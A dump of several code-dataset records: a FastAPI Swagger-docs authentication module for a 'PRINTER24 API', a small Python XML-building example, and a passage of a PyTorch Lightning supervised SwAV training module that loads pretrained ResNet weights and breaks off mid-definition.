get_swagger_ui_html\nfrom fastapi import Depends, Response, Request\nfrom fastapi.responses import ORJSONResponse\nfrom fastapi.openapi.utils import get_openapi\n\nfrom framework.docs.metadata import OpenAPIMetadata\nfrom framework.middleware.authentication import BasicAuth, SuperAdmin\n\n\nclass Documentation:\n\n    def __init__(self, app):\n        self.user = None\n        self.load(app)\n\n    def show_auth_dialog(self) -> Response:\n        return Response(headers={\"WWW-Authenticate\": \"Basic\"}, status_code=401)\n\n    def load(self, app):\n        @app.get(\"/docs\", include_in_schema=False)\n        async def custom_swagger_ui_html(request: Request):\n            return get_swagger_ui_html(openapi_url=\"/openapi.json\", title=\"Docs\")\n\n        @app.get(\"/openapi.json\", include_in_schema=False, dependencies=[Depends(SuperAdmin)])\n        async def get_open_api_endpoint():\n            return ORJSONResponse(get_openapi(\n                title=\"PRINTER24 API\",\n                version=\"1.0.0\",\n                routes=app.routes,\n                description=OpenAPIMetadata.description,\n                tags=OpenAPIMetadata.tags_metadata\n            ))\n\n        @app.get(\"/docs/login\", include_in_schema=False)\n        async def docs_auth(auth: BasicAuth = Depends(BasicAuth(auto_error=False))):\n            if not auth:\n                response = Response(headers={\"WWW-Authenticate\": \"Basic\"}, status_code=401)\n                return response\n\n    def validate(self, token):\n        pass\n","repo_name":"broluja/Printer24","sub_path":"framework/docs/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"26831900440","text":"import xml.etree.ElementTree as ET\n\nroot = ET.Element(\"data\")\nmovie_1 = ET.SubElement(root, \"movie\", {\"title\": \"The Little Prince\", \"rate\": \"5\"})\nmovie_2 = ET.SubElement(root, \"movie\", {\"title\": \"Hamlet\", \"rate\": \"5\"})\n\n# dump() allows us to debug either the whole tree or a single element\nET.dump(root)\n\n# The ElementTree object allows us to save the document via its write() method,\n# e.g. tree.write('movies.xml') (the filename here is only illustrative)\ntree = ET.ElementTree(root)\n","repo_name":"yukikitayama/python","sub_path":"file/build_xml.py","file_name":"build_xml.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"37872962225","text":"\"\"\"\r\nAdapted from official swav implementation: https://github.com/facebookresearch/swav\r\n\"\"\"\r\nimport os\r\nimport sys\r\nimport ast\r\nfrom argparse import ArgumentParser, Action\r\nfrom time import sleep\r\nimport math\r\nfrom collections import OrderedDict\r\n\r\nimport numpy as np\r\nimport pytorch_lightning as pl\r\nimport torch\r\nfrom pytorch_lightning.callbacks import LearningRateMonitor, ModelCheckpoint\r\nfrom torch import distributed as dist\r\nfrom torch import nn\r\nfrom torch.utils import model_zoo\r\nimport torch.nn.functional as F\r\nfrom torchmetrics import Accuracy\r\n\r\nfrom pl_bolts.optimizers.lars import LARS\r\nfrom pl_bolts.transforms.dataset_normalizations import (\r\n    cifar10_normalization,\r\n    imagenet_normalization,\r\n    stl10_normalization,\r\n)\r\nfrom pytorch_lightning.utilities.cloud_io import load as load_checkpoint\r\n\r\ntry:\r\n    from supervised_swav_resnet import resnet18, resnet50, ResNet, BasicBlock\r\nexcept:\r\n    from .supervised_swav_resnet import resnet18, resnet50, ResNet, BasicBlock\r\n\r\nmodel_urls = {\r\n    'resnet18': 'https://download.pytorch.org/models/resnet18-f37072fd.pth',\r\n    'resnet34': 'https://download.pytorch.org/models/resnet34-b627a593.pth',\r\n    'resnet50': 
'https://download.pytorch.org/models/resnet50-0676ba61.pth', # from Mar 2021\r\n    'resnet50_old': 'https://download.pytorch.org/models/resnet50-19c8e357.pth', # from Jan 2017, used in e.g. FixBi\r\n    'resnet101': 'https://download.pytorch.org/models/resnet101-63fe2227.pth',\r\n    'resnet152': 'https://download.pytorch.org/models/resnet152-394f9c45.pth',\r\n    'resnext50_32x4d': 'https://download.pytorch.org/models/resnext50_32x4d-7cdf4587.pth',\r\n    'resnext101_32x8d': 'https://download.pytorch.org/models/resnext101_32x8d-8ba56ff5.pth',\r\n    'wide_resnet50_2': 'https://download.pytorch.org/models/wide_resnet50_2-95faca4d.pth',\r\n    'wide_resnet101_2': 'https://download.pytorch.org/models/wide_resnet101_2-32ee1156.pth',\r\n}\r\n\r\ndef linear_warmup_decay(warmup_steps, total_steps, decay_type='cosine', alpha=10, beta=0.75):\r\n    assert decay_type in ['constant', 'cosine', 'linear', 'inv_prop']\r\n\r\n    def fn(step):\r\n        if step < warmup_steps:\r\n            return float(step) / float(max(1, warmup_steps))\r\n\r\n        if decay_type == 'constant':\r\n            # no decay\r\n            return 1.0\r\n\r\n        progress = float(step - warmup_steps) / float(max(1, total_steps - warmup_steps))\r\n        if decay_type == 'cosine':\r\n            # cosine decay\r\n            return 0.5 * (1.0 + math.cos(math.pi * progress))\r\n        elif decay_type == 'inv_prop':\r\n            # \"inversely proportional\" decay\r\n            return (1 + alpha*progress)**-beta\r\n        else:\r\n            # linear decay\r\n            return 1.0 - progress\r\n\r\n    return fn\r\n
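\r\n# Illustrative usage of the schedule factory above (hypothetical step counts;\r\n# the actual wiring happens in configure_optimizers further below):\r\n#\r\n#   optimizer = torch.optim.Adam(model.parameters(), lr=1e-3)\r\n#   scheduler = torch.optim.lr_scheduler.LambdaLR(\r\n#       optimizer, linear_warmup_decay(warmup_steps=500, total_steps=10000))\r\n#   # ...then call scheduler.step() once per training step, not per epoch.\r\n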
\r\nclass SupervisedSwAV(pl.LightningModule):\r\n\r\n    def __init__(\r\n        self,\r\n        gpus: int,\r\n        num_samples: int,\r\n        batch_size: int,\r\n        dataset: str,\r\n        num_classes: int,\r\n        supervised_hidden_mlp: int = 2048,\r\n        supervised_weight: float = 1.,\r\n        share_hidden_mlp: bool = False,\r\n        supervised_head_after_proj_head: bool = False,\r\n        imagenet_pretrained: bool = False,\r\n        old_pretrained_weights: bool = False,\r\n        pretrained_checkpoint: str = None,\r\n        backbone_lr_scaling: float = 1.0,\r\n        val_names: list = None,\r\n        num_nodes: int = 1,\r\n        arch: str = 'resnet50',\r\n        hidden_mlp: int = 2048,\r\n        feat_dim: int = 128,\r\n        warmup_epochs: int = 10,\r\n        max_epochs: int = 100,\r\n        nmb_prototypes: int = 3000,\r\n        freeze_prototypes_epochs: int = 1,\r\n        temperature: float = 0.1,\r\n        sinkhorn_iterations: int = 3,\r\n        queue_length: int = 0,  # must be divisible by total batch-size\r\n        epoch_queue_starts: int = 15,\r\n        crops_for_assign: list = [0, 1],\r\n        nmb_crops: list = [2, 6],\r\n        first_conv: bool = True,\r\n        maxpool1: bool = True,\r\n        norm_layer: str = 'batch_norm',\r\n        num_groups: int = 16,\r\n        optimizer: str = 'adam',\r\n        start_lr: float = 0.,\r\n        learning_rate: float = 1e-3,\r\n        final_lr: float = 0.,\r\n        lr_schedule_type: str = 'cosine',\r\n        weight_decay: float = 1e-6,\r\n        epsilon: float = 0.05,\r\n        prototype_entropy_regularization_weight: float = 1.,\r\n        prototype_entropy_regularization_type: str = 'separate_optimizer',\r\n        supervised_contrastive: bool = False,\r\n        **kwargs\r\n    ):\r\n        \"\"\"\r\n        Args:\r\n            gpus: number of gpus per node used in training, passed to SwAV module\r\n                to manage the queue and select distributed sinkhorn\r\n            num_nodes: number of nodes to train on\r\n            num_samples: number of image samples used for training\r\n            batch_size: batch size per GPU in ddp\r\n            dataset: dataset being used for train/val\r\n            num_classes: number of classes in the dataset\r\n            supervised_hidden_mlp: hidden layer of non-linear supervised learning head,\r\n                set to 0 to use a linear projection head\r\n            supervised_weight: weighting factor to multiply supervised loss with\r\n                before adding it to the total loss\r\n            share_hidden_mlp: Whether supervised head and swav's projection head should share their hidden layer. If this is set to True,\r\n                `supervised_hidden_mlp` will have no effect, and `hidden_mlp` will define the size of the hidden layer used by both heads.\r\n            imagenet_pretrained: Whether to initialize the weights of the backbone to values pretrained on imagenet\r\n            old_pretrained_weights: If `imagenet_pretrained` is true: whether to use older pretrained weights from Jan 2017, or newer ones from Mar 2021.\r\n                Otherwise: no effect.\r\n            pretrained_checkpoint: checkpoint to load pretrained weights from. If none is provided, one from pytorch's model_zoo will be used\r\n            val_names: in case of multiple validation dataloaders, this list should\r\n                contain names identifying them (in the same order)\r\n            arch: encoder architecture used for pre-training\r\n            hidden_mlp: hidden layer of non-linear projection head, set to 0\r\n                to use a linear projection head\r\n            feat_dim: output dim of the projection head\r\n            warmup_epochs: apply linear warmup for this many epochs\r\n            max_epochs: epoch count for pre-training\r\n            nmb_prototypes: count of prototype vectors\r\n            freeze_prototypes_epochs: epoch until which gradients of prototype layer\r\n                are frozen\r\n            temperature: loss temperature\r\n            sinkhorn_iterations: iterations for sinkhorn normalization\r\n            queue_length: set queue when batch size is small,\r\n                must be divisible by total batch-size (i.e. total_gpus * batch_size),\r\n                set to 0 to remove the queue\r\n            epoch_queue_starts: start using the queue after this epoch\r\n            crops_for_assign: list of crop ids for computing assignment\r\n            nmb_crops: number of global and local crops, ex: [2, 6]\r\n            first_conv: keep first conv same as the original resnet architecture,\r\n                if set to false it is replaced by a kernel 3, stride 1 conv (cifar-10)\r\n            maxpool1: keep first maxpool layer same as the original resnet architecture,\r\n                if set to false, first maxpool is turned off (cifar10, maybe stl10)\r\n            norm_layer: the type of normalization layer to use in the network (batch_norm or group_norm)\r\n            num_groups: in case group_norm is chosen as norm_layer, this sets the number of groups\r\n            optimizer: optimizer to use\r\n            start_lr: starting lr for linear warmup\r\n            learning_rate: learning rate\r\n            final_lr: final learning rate for cosine weight decay\r\n            lr_schedule_type: type of learning rate schedule to use (constant, linear, cosine or inv_prop)\r\n            weight_decay: weight decay for optimizer\r\n            epsilon: epsilon val for swav assignments\r\n            supervised_head_after_proj_head: Whether to change the architecture such that\r\n                the supervised head attaches after swav's projection head and the l2norm\r\n            backbone_lr_scaling: factor to scale the backbone learning rate with\r\n            prototype_entropy_regularization_weight: weight of the prototype entropy regularization\r\n                (0 for no regularization)\r\n            prototype_entropy_regularization_type: type of prototype entropy regularization\r\n                (same_optimizer or separate_optimizer)\r\n            supervised_contrastive: whether to use the supervised contrastive objective,\r\n                using all samples of the same class as positives for the swav loss \r\n        \"\"\"\r\n        super().__init__()\r\n        self.save_hyperparameters()\r\n\r\n        if nmb_prototypes == 0 and prototype_entropy_regularization_weight != 0:\r\n            raise ValueError('Prototype entropy regularization is not possible without prototypes')\r\n\r\n        if not supervised_head_after_proj_head and prototype_entropy_regularization_weight != 0:\r\n            raise 
ValueError('Prototype entropy regularization requires the supervised_head_after_proj_head architecture')\r\n\r\n        if sum(nmb_crops) <= 1:\r\n            raise ValueError('Need at least 2 crops to perform swapped prediction')\r\n\r\n        self.gpus = gpus\r\n        self.num_nodes = num_nodes\r\n        self.arch = arch\r\n        self.dataset = dataset\r\n        self.num_samples = num_samples\r\n        self.batch_size = batch_size\r\n\r\n        self.hidden_mlp = hidden_mlp\r\n        self.feat_dim = feat_dim\r\n        self.nmb_prototypes = nmb_prototypes\r\n        self.freeze_prototypes_epochs = freeze_prototypes_epochs\r\n        self.sinkhorn_iterations = sinkhorn_iterations\r\n\r\n        self.queue_length = queue_length\r\n        self.epoch_queue_starts = epoch_queue_starts\r\n        self.crops_for_assign = crops_for_assign\r\n        self.nmb_crops = nmb_crops\r\n\r\n        self.first_conv = first_conv\r\n        self.maxpool1 = maxpool1\r\n        self.norm_layer = norm_layer\r\n        self.num_groups = num_groups\r\n\r\n        self.optim = optimizer\r\n        self.weight_decay = weight_decay\r\n        self.epsilon = epsilon\r\n        self.temperature = temperature\r\n\r\n        self.start_lr = start_lr\r\n        self.final_lr = final_lr\r\n        self.learning_rate = learning_rate\r\n        self.lr_schedule_type = lr_schedule_type\r\n        self.warmup_epochs = warmup_epochs\r\n        self.max_epochs = max_epochs\r\n\r\n        self.supervised_hidden_mlp = supervised_hidden_mlp\r\n        self.supervised_weight = supervised_weight\r\n        self.num_classes = num_classes\r\n        self.share_hidden_mlp = share_hidden_mlp\r\n        self.supervised_head_after_proj_head = supervised_head_after_proj_head\r\n\r\n        self.val_names = val_names\r\n        self.imagenet_pretrained = imagenet_pretrained\r\n        self.pretrained_checkpoint = pretrained_checkpoint\r\n        self.old_pretrained_weights = old_pretrained_weights\r\n        self.backbone_lr_scaling = backbone_lr_scaling\r\n\r\n        self.prototype_entropy_regularization_weight = prototype_entropy_regularization_weight\r\n        self.prototype_entropy_regularization_type = prototype_entropy_regularization_type\r\n\r\n        self.supervised_contrastive = supervised_contrastive\r\n\r\n        if self.gpus * self.num_nodes > 1:\r\n            self.get_assignments = self.distributed_sinkhorn\r\n        else:\r\n            self.get_assignments = self.sinkhorn\r\n\r\n        self.model = self.init_model()\r\n\r\n        # compute iters per epoch\r\n        global_batch_size = self.num_nodes * self.gpus * self.batch_size if self.gpus > 0 else self.batch_size\r\n        self.train_iters_per_epoch = self.num_samples // global_batch_size\r\n\r\n        self.queue = None\r\n        self.use_the_queue = False\r\n        self.softmax = nn.Softmax(dim=1)\r\n\r\n        # metrics\r\n        self.train_acc = Accuracy()\r\n        if val_names:\r\n            for name in val_names:\r\n                setattr(self, f'{name}_val_acc', Accuracy(compute_on_step=False))\r\n        else:\r\n            self.val_acc = Accuracy(compute_on_step=False)\r\n        self.test_acc = Accuracy(compute_on_step=False)\r\n\r\n    def init_model(self):\r\n        if self.arch == 'resnet18':\r\n            backbone = resnet18\r\n            initial_filters = 64\r\n        elif self.arch == 'resnet18_w32':\r\n            backbone = resnet18\r\n            initial_filters = 32\r\n        elif self.arch == 'resnet18_w16':\r\n            backbone = resnet18\r\n            initial_filters = 16\r\n        elif self.arch == 'resnet50':\r\n            backbone = resnet50\r\n            initial_filters = 64\r\n        elif self.arch == 'resnet50_w32':\r\n            backbone = resnet50\r\n            initial_filters = 32\r\n        elif self.arch == 'resnet50_w16':\r\n            backbone = resnet50\r\n            initial_filters = 16\r\n        elif self.arch == 'resnet32_w16':\r\n            # the ResNet as used in the resnet paper (https://arxiv.org/pdf/1512.03385.pdf) for cifar10 classification, with n=5\r\n            # note that they did not use a dense layer in the classification head, 
corresponding to self.supervised_hidden_mlp = 0\r\n backbone = lambda **kwargs: ResNet(BasicBlock, [5, 5, 5], **kwargs)\r\n initial_filters = 16\r\n elif self.arch == 'resnet26_w32':\r\n # as used in the MT3 paper\r\n backbone = lambda **kwargs: ResNet(BasicBlock, [4, 4, 4], **kwargs)\r\n initial_filters = 32\r\n else:\r\n raise ValueError('Invalid architecture name')\r\n\r\n if self.norm_layer == 'batch_norm':\r\n norm_layer = nn.BatchNorm2d\r\n elif self.norm_layer == 'group_norm':\r\n norm_layer = lambda num_channels: nn.GroupNorm(self.num_groups, num_channels)\r\n else:\r\n raise ValueError('Invalid norm layer name')\r\n\r\n model = backbone(\r\n num_classes=self.num_classes,\r\n supervised_hidden_mlp=self.supervised_hidden_mlp,\r\n share_hidden_mlp=self.share_hidden_mlp,\r\n width_per_group=initial_filters,\r\n norm_layer=norm_layer,\r\n normalize=True,\r\n hidden_mlp=self.hidden_mlp,\r\n output_dim=self.feat_dim,\r\n nmb_prototypes=self.nmb_prototypes,\r\n first_conv=self.first_conv,\r\n maxpool1=self.maxpool1,\r\n supervised_head_after_proj_head=self.supervised_head_after_proj_head,\r\n )\r\n if self.imagenet_pretrained:\r\n if self.arch != 'resnet50' or not self.first_conv or not self.maxpool1:\r\n raise ValueError('Pretrained weights are only available for the resnet50 with first_conv and maxpool1 = True')\r\n if self.pretrained_checkpoint is None:\r\n missing_keys, unexpected_keys = model.load_state_dict(model_zoo.load_url(model_urls['resnet50' + ('_old' if self.old_pretrained_weights else '')]), strict=False)\r\n else:\r\n checkpoint_state_dict = load_checkpoint(self.pretrained_checkpoint)['state_dict']\r\n # remove the prefix \"model.\" from keys, if present\r\n checkpoint_state_dict = OrderedDict([(k[6:], v) if k.startswith('model.') else (k, v) for k, v in checkpoint_state_dict.items()])\r\n missing_keys, unexpected_keys = model.load_state_dict(checkpoint_state_dict, strict=False)\r\n print('Missing keys while loading state dict:', missing_keys)\r\n print('Unexpected keys while loading state dict:', unexpected_keys)\r\n return model\r\n\r\n def forward(self, x):\r\n # pass single batch through resnet backbone and supervised head\r\n return self.model(x)\r\n\r\n def forward_backbone(self, x):\r\n # pass single batch from the resnet backbone\r\n return self.model.forward_backbone(x)\r\n\r\n def forward_embeddings(self, x):\r\n # pass single batch through resnet backbone and projection head (including normalization)\r\n result = self.model.forward_swav(x)\r\n return result[0] if isinstance(result, tuple) else result\r\n\r\n def get_prototypes(self):\r\n return self.model.prototypes.weight if self.model.prototypes is not None else None\r\n\r\n def on_train_epoch_start(self):\r\n if self.queue_length > 0:\r\n if self.trainer.current_epoch >= self.epoch_queue_starts and self.queue is None:\r\n self.queue = torch.zeros(\r\n len(self.crops_for_assign),\r\n self.queue_length // self.gpus, # change to nodes * gpus once multi-node\r\n self.feat_dim,\r\n )\r\n\r\n if self.gpus > 0:\r\n self.queue = self.queue.cuda()\r\n\r\n self.use_the_queue = False\r\n\r\n def on_after_backward(self):\r\n if self.current_epoch < self.freeze_prototypes_epochs:\r\n for name, p in self.model.named_parameters():\r\n if \"prototypes\" in name:\r\n p.grad = None\r\n\r\n def shared_step(self, batch, acc_metric): #, conf_mat):\r\n if self.dataset == 'stl10':\r\n unlabeled_batch = batch[0]\r\n batch = unlabeled_batch\r\n\r\n inputs, labels = batch\r\n\r\n # last element of inputs: batch used for supervised 
training\r\n        # rest of the inputs: multicrop-batches for SwAV\r\n        # if inputs contains only one element, only supervised learning is performed\r\n        # if inputs contains exactly sum(self.nmb_crops) elements, only swav is performed\r\n        # otherwise, an error is raised\r\n\r\n        if len(inputs) not in (1, sum(self.nmb_crops), sum(self.nmb_crops) + 1):\r\n            raise ValueError(\r\n                f'Got inputs of invalid length {len(inputs)}, when either length 1 for supervised only, '\r\n                f'length {sum(self.nmb_crops)} for swav only, or length {sum(self.nmb_crops) + 1} for both jointly was expected.'\r\n            )\r\n\r\n        swav_loss = 0\r\n\r\n        if len(inputs) > 1:\r\n            ## SwAV\r\n\r\n            # 1. normalize the prototypes\r\n            with torch.no_grad():\r\n                w = self.model.prototypes.weight.data.clone()\r\n                w = nn.functional.normalize(w, dim=1, p=2)\r\n                self.model.prototypes.weight.copy_(w)\r\n\r\n            # 2. multi-res forward passes\r\n            if len(inputs) == sum(self.nmb_crops):\r\n                # swav only\r\n                embedding, output = self.model.forward_swav(inputs)\r\n            else:\r\n                # supervised + swav\r\n                logits, (embedding, output) = self.model(inputs)\r\n            embedding = embedding.detach()\r\n            bs = inputs[0].size(0)\r\n\r\n            # 3. swav loss computation\r\n            for i, crop_id in enumerate(self.crops_for_assign):\r\n                with torch.no_grad():\r\n                    out = output[bs * crop_id:bs * (crop_id + 1)]\r\n\r\n                    # 4. time to use the queue\r\n                    if self.queue is not None:\r\n                        if self.use_the_queue or not torch.all(self.queue[i, -1, :] == 0):\r\n                            self.use_the_queue = True\r\n                            out = torch.cat((torch.mm(self.queue[i], self.model.prototypes.weight.t()), out))\r\n                        # fill the queue\r\n                        self.queue[i, bs:] = self.queue[i, :-bs].clone()\r\n                        self.queue[i, :bs] = embedding[crop_id * bs:(crop_id + 1) * bs]\r\n\r\n                    # 5. get assignments\r\n                    q = torch.exp(out / self.epsilon).t()\r\n                    q = self.get_assignments(q, self.sinkhorn_iterations)[-bs:]\r\n\r\n                # output = [crop_0_of_sample_0, crop_0_of_sample_1, ..., crop_1_of_sample_0, crop_1_of_sample_1, ..., ...]\r\n                #           <---------- crop 0 of the batch ---------->, <---------- crop 1 of the batch ---------->, ...\r\n\r\n                # cluster assignment prediction\r\n                if self.supervised_contrastive:\r\n                    p = self.softmax(output / self.temperature) # generate the p-term in the swav loss for all crops of all images in the batch\r\n\r\n                    # matrix of size (bs, sum(self.nmb_crops) * bs), which contains the potential losses for the prediction of all the cosine_similarities by all the assignments in the batch (for this crop)\r\n                    potential_sublosses = -torch.mm(q, torch.log(p).t())\r\n\r\n                    # the value at position i,j of this matrix defines whether the i'th soft assignment (q) should be matched with the j'th cosine_similarity\r\n                    # i is in [0, bs), while j is in [0, sum(self.nmb_crops) * bs)\r\n                    # because assignments are only made for one crop per loop iteration, and cosine_similarities (`output`/`p`) are available for all crops at the same time\r\n                    classes_matching_index_not_matching = torch.cat([torch.stack([labels == label for label in labels]) for _ in range(sum(self.nmb_crops))], dim=1)\r\n\r\n                    # don't match to the exact same image itself (note that this only excludes this exact crop of the image, not the other crops of multi-crop)\r\n                    for i in range(bs):\r\n                        classes_matching_index_not_matching[i, crop_id*bs + i] = False\r\n\r\n                    swav_loss += torch.mean(potential_sublosses[classes_matching_index_not_matching])\r\n
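\r\n                # Toy illustration of the mask above (hypothetical values): with\r\n                # labels = [0, 0, 1], bs = 3 and sum(self.nmb_crops) = 2, row i\r\n                # selects every column whose sample shares label i, across both\r\n                # crops:\r\n                #   [[T, T, F,  T, T, F],\r\n                #    [T, T, F,  T, T, F],\r\n                #    [F, F, T,  F, F, T]]\r\n                # minus the entries zeroed out just above, so an assignment is\r\n                # never matched with the very crop it was computed from.\r\n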
\r\n                else:\r\n                    subloss = 0\r\n                    for v in np.delete(np.arange(np.sum(self.nmb_crops)), crop_id):\r\n                        p = self.softmax(output[bs * v:bs * (v + 1)] / self.temperature)\r\n                        subloss -= torch.mean(torch.sum(q * torch.log(p), dim=1))\r\n                    swav_loss += subloss / (np.sum(self.nmb_crops) - 1)\r\n\r\n            swav_loss /= len(self.crops_for_assign)\r\n        else:\r\n            # supervised only\r\n            logits = self.model(inputs)\r\n\r\n        ce_loss = 0\r\n        if len(inputs) != sum(self.nmb_crops):\r\n            ## Supervised\r\n            ce_loss = F.cross_entropy(logits, labels)\r\n            acc_metric(logits, labels)\r\n\r\n        joint_loss = swav_loss + self.supervised_weight * ce_loss\r\n\r\n        return ce_loss, swav_loss, joint_loss\r\n\r\n    def training_step(self, batch, batch_idx, optimizer_idx=0):\r\n        if optimizer_idx == 0:\r\n            ce_loss, swav_loss, joint_loss = self.shared_step(batch, self.train_acc) #, self.train_conf_mat)\r\n\r\n            self.log('train/ce_loss', ce_loss, on_step=True, on_epoch=False)\r\n            self.log('train/swav_loss', swav_loss, on_step=True, on_epoch=False)\r\n            self.log('train/joint_loss', joint_loss, on_step=True, on_epoch=False)\r\n\r\n            self.log('train/acc', self.train_acc, prog_bar=True)\r\n\r\n            if self.prototype_entropy_regularization_type == 'same_optimizer' and self.prototype_entropy_regularization_weight != 0:\r\n                joint_loss = joint_loss + self.prototype_entropy_regularization_weight * self.get_regularization_term()\r\n\r\n            return joint_loss\r\n        elif optimizer_idx == 1:\r\n            return self.get_regularization_term()\r\n\r\n    def get_regularization_term(self):\r\n        prototype_classifications = self.softmax(\r\n            self.model.supervised_head(self.model.prototypes.weight)\r\n        )\r\n        # average entropy of each individual prototype classification (marginal entropy)\r\n        # -> minimize to have prototypes that closely resemble actual classes\r\n        proto_entropy = torch.mean(-torch.sum(prototype_classifications * torch.log(prototype_classifications), dim=1))\r\n        self.log('train/prototype_classification_entropy', proto_entropy, on_step=True, on_epoch=False)\r\n\r\n        # entropy of all classifications averaged -> maximize to have each class represented an equal number of times\r\n        classification_mean = torch.mean(prototype_classifications, dim=0)\r\n        mean_classification_entropy = -torch.sum(classification_mean * torch.log(classification_mean))\r\n        self.log('train/proto_mean_classification_entropy', mean_classification_entropy, on_step=True, on_epoch=False)\r\n\r\n        return proto_entropy - mean_classification_entropy\r\n\r\n    def validation_step(self, batch, batch_idx, dataloader_id=None):\r\n        if dataloader_id is not None:\r\n            dataloader_name = self.val_names[dataloader_id]\r\n\r\n        ce_loss, swav_loss, joint_loss = self.shared_step(\r\n            batch,\r\n            self.val_acc if dataloader_id is None else getattr(self, f'{dataloader_name}_val_acc')\r\n        )\r\n\r\n        slash_dataloader_name = f'/{dataloader_name}' if dataloader_id is not None else ''\r\n        self.log(f'val{slash_dataloader_name}/ce_loss', ce_loss, on_step=False, on_epoch=True, add_dataloader_idx=False)\r\n        self.log(f'val{slash_dataloader_name}/swav_loss', swav_loss, on_step=False, on_epoch=True, add_dataloader_idx=False)\r\n        self.log(f'val{slash_dataloader_name}/joint_loss', joint_loss, on_step=False, on_epoch=True, add_dataloader_idx=False)\r\n\r\n        self.log(\r\n            f'val{slash_dataloader_name}/acc',\r\n            self.val_acc if dataloader_id is None else getattr(self, f'{dataloader_name}_val_acc'),\r\n            add_dataloader_idx=False\r\n        )\r\n\r\n        return joint_loss\r\n\r\n    def test_step(self, batch, batch_idx):\r\n        inputs, labels = batch\r\n        assert not isinstance(inputs, list), \"Test data should not be multi-cropped\"\r\n\r\n        logits = self.model(inputs)\r\n        ce_loss = F.cross_entropy(logits, labels)\r\n        self.test_acc(logits, 
labels)\r\n\r\n self.log('test/ce_loss', ce_loss, on_step=False, on_epoch=True)\r\n self.log('test/acc', self.test_acc)\r\n\r\n return ce_loss\r\n\r\n def scale_backbone_lr(self, named_params, learning_rate, scale_factor=0.1):\r\n backbone_params = []\r\n head_params = []\r\n\r\n for name, param in named_params:\r\n if not param.requires_grad:\r\n continue\r\n elif any(layer_name in name for layer_name in ('shared_head', 'supervised_head', 'projection_head', 'prototypes')):\r\n head_params.append(param)\r\n else:\r\n backbone_params.append(param)\r\n\r\n return [{'params': head_params, 'lr': learning_rate}, {'params': backbone_params, 'lr': learning_rate*scale_factor}]\r\n\r\n def configure_optimizers(self):\r\n if self.backbone_lr_scaling != 1:\r\n params = self.scale_backbone_lr(self.named_parameters(), learning_rate=self.learning_rate, scale_factor=self.backbone_lr_scaling)\r\n else:\r\n params = self.parameters()\r\n\r\n if self.optim == 'lars':\r\n optimizer = LARS(\r\n params,\r\n lr=self.learning_rate,\r\n momentum=0.9,\r\n weight_decay=self.weight_decay,\r\n trust_coefficient=0.001,\r\n )\r\n elif self.optim == 'adam':\r\n optimizer = torch.optim.Adam(params, lr=self.learning_rate, weight_decay=self.weight_decay)\r\n elif self.optim == 'sgd':\r\n optimizer = torch.optim.SGD(params, lr=self.learning_rate, momentum=0.9, weight_decay=self.weight_decay)\r\n\r\n warmup_steps = self.train_iters_per_epoch * self.warmup_epochs\r\n total_steps = self.train_iters_per_epoch * self.max_epochs\r\n\r\n scheduler = {\r\n \"scheduler\": torch.optim.lr_scheduler.LambdaLR(\r\n optimizer,\r\n linear_warmup_decay(warmup_steps, total_steps, decay_type=self.lr_schedule_type),\r\n ),\r\n \"interval\": \"step\",\r\n \"frequency\": 1,\r\n }\r\n\r\n if self.prototype_entropy_regularization_type == 'separate_optimizer' and self.prototype_entropy_regularization_weight != 0:\r\n prototype_parameters = [param for name, param in self.named_parameters() if 'prototypes' in name]\r\n regularization_lr = self.learning_rate * self.prototype_entropy_regularization_weight\r\n\r\n if self.optim == 'lars':\r\n prototype_entropy_optimizer = LARS(\r\n prototype_parameters,\r\n lr=regularization_lr,\r\n momentum=0.9,\r\n weight_decay=self.weight_decay,\r\n trust_coefficient=0.001,\r\n )\r\n elif self.optim == 'adam':\r\n prototype_entropy_optimizer = torch.optim.Adam(prototype_parameters, lr=regularization_lr, weight_decay=self.weight_decay)\r\n elif self.optim == 'sgd':\r\n prototype_entropy_optimizer = torch.optim.SGD(prototype_parameters, lr=regularization_lr, momentum=0.9, weight_decay=self.weight_decay)\r\n\r\n prototype_entropy_scheduler = {\r\n \"scheduler\": torch.optim.lr_scheduler.LambdaLR(\r\n prototype_entropy_optimizer,\r\n linear_warmup_decay(warmup_steps, total_steps, decay_type=self.lr_schedule_type),\r\n ),\r\n \"interval\": \"step\",\r\n \"frequency\": 1,\r\n }\r\n\r\n return [optimizer, prototype_entropy_optimizer], [scheduler, prototype_entropy_scheduler]\r\n\r\n return [optimizer], [scheduler]\r\n\r\n def sinkhorn(self, Q, nmb_iters):\r\n with torch.no_grad():\r\n sum_Q = torch.sum(Q)\r\n Q /= sum_Q\r\n\r\n K, B = Q.shape\r\n\r\n if self.gpus > 0:\r\n u = torch.zeros(K).cuda()\r\n r = torch.ones(K).cuda() / K\r\n c = torch.ones(B).cuda() / B\r\n else:\r\n u = torch.zeros(K)\r\n r = torch.ones(K) / K\r\n c = torch.ones(B) / B\r\n\r\n for _ in range(nmb_iters):\r\n u = torch.sum(Q, dim=1)\r\n\r\n Q *= (r / u).unsqueeze(1)\r\n Q *= (c / torch.sum(Q, dim=0)).unsqueeze(0)\r\n\r\n return (Q / torch.sum(Q, 
dim=0, keepdim=True)).t().float()\r\n\r\n def distributed_sinkhorn(self, Q, nmb_iters):\r\n with torch.no_grad():\r\n sum_Q = torch.sum(Q)\r\n dist.all_reduce(sum_Q)\r\n Q /= sum_Q\r\n\r\n if self.gpus > 0:\r\n u = torch.zeros(Q.shape[0]).cuda(non_blocking=True)\r\n r = torch.ones(Q.shape[0]).cuda(non_blocking=True) / Q.shape[0]\r\n c = torch.ones(Q.shape[1]).cuda(non_blocking=True) / (self.gpus * Q.shape[1])\r\n else:\r\n u = torch.zeros(Q.shape[0])\r\n r = torch.ones(Q.shape[0]) / Q.shape[0]\r\n c = torch.ones(Q.shape[1]) / (self.gpus * Q.shape[1])\r\n\r\n curr_sum = torch.sum(Q, dim=1)\r\n dist.all_reduce(curr_sum)\r\n\r\n for it in range(nmb_iters):\r\n u = curr_sum\r\n Q *= (r / u).unsqueeze(1)\r\n Q *= (c / torch.sum(Q, dim=0)).unsqueeze(0)\r\n curr_sum = torch.sum(Q, dim=1)\r\n dist.all_reduce(curr_sum)\r\n return (Q / torch.sum(Q, dim=0, keepdim=True)).t().float()\r\n\r\n @staticmethod\r\n def add_model_specific_args(parent_parser):\r\n def true_false(arg):\r\n if arg == 'True':\r\n return True\r\n elif arg == 'False':\r\n return False\r\n else:\r\n raise ValueError()\r\n\r\n def 